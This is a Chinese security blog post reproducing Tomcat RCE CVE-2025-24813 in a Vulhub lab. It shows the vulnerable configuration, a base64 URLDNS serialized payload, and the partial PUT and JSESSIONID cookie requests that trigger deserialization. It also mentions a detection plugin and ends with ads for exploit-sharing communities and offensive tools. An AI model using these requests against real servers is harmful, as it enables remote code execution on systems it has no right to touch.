[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

admin

139164
文章

114
评论

2025年3月25日15:38:19评论25 views字数 3379阅读11分15秒阅读模式

扫码加内部知识圈

获取漏洞资料

本文章由团队成员[Tai]授权并发布

Vulhub靶场复现：Tomcat远程代码执行漏洞（CVE-2025-24813），附检测插件

靶场地址如下，还是热乎的：

https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2025-24813

漏洞详情

Apache Tomcat 是一个广泛使用的开源Java Servlet、JavaServer Pages、Java Expression Language和WebSocket技术的实现。

在 Tomcat 版本 9.x ~ 9.0.97，10.x ~ 10.1.34, 11.x ~ 11.0.2 中，当 Tomcat 同时配置了可写的 DefaultServlet（readonly=false）和基于文件的会话持久化时，攻击者可以向服务器写入任意文件，并通过操作 JSESSIONID cookie 触发这些文件的反序列化，最终导致远程代码执行。

该漏洞存在的原因是Tomcat中两个关键的错误配置。首先，DefaultServlet配置了readonly=false，允许文件上传：

<servlet>    <servlet-name>default</servlet-name>    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>    <init-param>        <param-name>debug</param-name>        <param-value>0</param-value>    </init-param>    <init-param>        <param-name>listings</param-name>        <param-value>false</param-value>    </init-param>    <init-param>        <param-name>readonly</param-name>        <param-value>false</param-value>    </init-param>    <load-on-startup>1</load-on-startup></servlet>

其次，Tomcat配置了基于文件的Session持久化：

<ManagerclassName="org.apache.catalina.session.PersistentManager">    <StoreclassName="org.apache.catalina.session.FileStore"/></Manager>

这两种配置都使用相同的默认存储路径：

$CATALINA_BASE/work/Catalina/localhost/ROOT

当发送不完全的PUT请求（使用Content-Range头）时，Tomcat会将文件路径中的分隔符(/)转换为句点(.)，并将文件临时存储在会话存储目录中。利用这个特效，我们可以将恶意序列化对象写入此临时文件中。

正文开始

把环境启动起来，首页如下图

这里尝试利用URLDNS gadget类打dnslog

首先生成一个dnslog域名

生成base64格式的序列化利用链

rO0ABXNyACLBqsGhwbbBocCuwbXBtMGpwazArsGIwaHBs8GowY3BocGwBQfawcMWYNEDAAJGABTBrMGvwaHBpMGGwaHBo8G0wa/BskkAEsG0wajBssGlwbPBqMGvwazBpHhwP0AAAAAAAAx3CAAAABAAAAABc3IAGMGqwaHBtsGhwK7BrsGlwbTArsGVwZLBjJYlNzYa/ORyAwAHSQAQwajBocGzwajBg8GvwaTBpUkACMGwwa/BssG0TAASwaHBtcG0wajBr8GywanBtMG5dAAkwYzBqsGhwbbBocCvwazBocGuwafAr8GTwbTBssGpwa7Bp8C7TAAIwabBqcGswaVxAH4AA0wACMGowa/Bs8G0cQB+AANMABDBsMGywa/BtMGvwaPBr8GscQB+AANMAAbBssGlwaZxAH4AA3hw//////////90ACbBqcGnwa7BtsG5wbPBssGrwbbBosCuwaTBp8GywajAs8CuwaPBrnQAAHEAfgAFdAAIwajBtMG0wbBweHQANMGowbTBtMGwwLrAr8CvwanBp8GuwbbBucGzwbLBq8G2waLArsGkwafBssGowLPArsGjwa54

发送带有Content-Range头的部分PUT请求，在临时目录中写入名为.deserialize.session的文件。记得在数据包中base64解码刚才生成的序列化内容

PUT /deserialize/session HTTP/1.1Host: 192.168.172.131:8080Content-Length: 1234Content-Range: bytes 0-5/10{{base64dec(rO0ABXNyACLBqsGhwbbBocCuwbXBtMGpwazArsGIwaHBs8GowY3BocGwBQfawcMWYNEDAAJGABTBrMGvwaHBpMGGwaHBo8G0wa/BskkAEsG0wajBssGlwbPBqMGvwazBpHhwP0AAAAAAAAx3CAAAABAAAAABc3IAGMGqwaHBtsGhwK7BrsGlwbTArsGVwZLBjJYlNzYa/ORyAwAHSQAQwajBocGzwajBg8GvwaTBpUkACMGwwa/BssG0TAASwaHBtcG0wajBr8GywanBtMG5dAAkwYzBqsGhwbbBocCvwazBocGuwafAr8GTwbTBssGpwa7Bp8C7TAAIwabBqcGswaVxAH4AA0wACMGowa/Bs8G0cQB+AANMABDBsMGywa/BtMGvwaPBr8GscQB+AANMAAbBssGlwaZxAH4AA3hw//////////90ACbBqcGnwa7BtsG5wbPBssGrwbbBosCuwaTBp8GywajAs8CuwaPBrnQAAHEAfgAFdAAIwajBtMG0wbBweHQANMGowbTBtMGwwLrAr8CvwanBp8GuwbbBucGzwbLBq8G2waLArsGkwafBssGowLPArsGjwa54)}}

可以在$CATALINA_BASE/work/Catalina/localhost/ROOT目录下看到上传到临时目录的包含恶意序列号对象的文件.deserialize.session

使用如下数据包触发反序列化

GET / HTTP/1.1Host: 192.168.172.131:8080Cookie: JSESSIONID=.deserialize

可见，URLDNS gadget被成功反序列化，并发送了DNS请求

基于此靶场，写了个yakit检测插件

插件ID为b2693364-4f40-4f1e-9a11-dae1895128b0，欢迎师傅们下载

内部知识圈子1周年啦！最后6天优惠！

渗透实战、src挖掘文档、漏洞poc、漏洞利用工具等尽在内部圈子社区【安全渗透感知大家族】

01 内部社区

（一周年优惠券立减￥30，扫码可以直接领取使用，最后7天即将到期）

02 内部社区

代码审计、红队工具、OA系统源码、审计教程参考文档等尽在内部圈子，扫码即可加入【赛博安服技术圈粉@】

C4安全团队公开交流群

QQ群和微信群都已建立，方便常用QQ或微信的师傅加入团队公开交流群，交流各类网安、实战方面的问题~

（微信群①群已满200人，需要邀请加开头运营二维码才能加入，②群如下）

END

关注Code4th安全团队

了解更多网络安全内容~

原文始发于微信公众号（C4安全团队）：[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

XG_NTAI: Webshell免杀、流量加密传输工具 V2.5

工具 | NavicatPwn

Yakit的免配置浏览器不是内置浏览器

基于AI自动绕过WAF的burp插件

Windows远控利器：Quasar

Spring漏洞扫描工具，springboot未授权扫描/敏感信息扫描以及进行spring相关漏洞的扫描与验证

若依Vue漏洞检测工具V5

超全渗透测试工具库

ScopeSentry:V1.7-内置800+密钥检测-ICP、APP、小程序自动化收集APP自动化反编译敏感信息查找

最新Chrome应用加密解密工具

发表评论

在线咨询

微信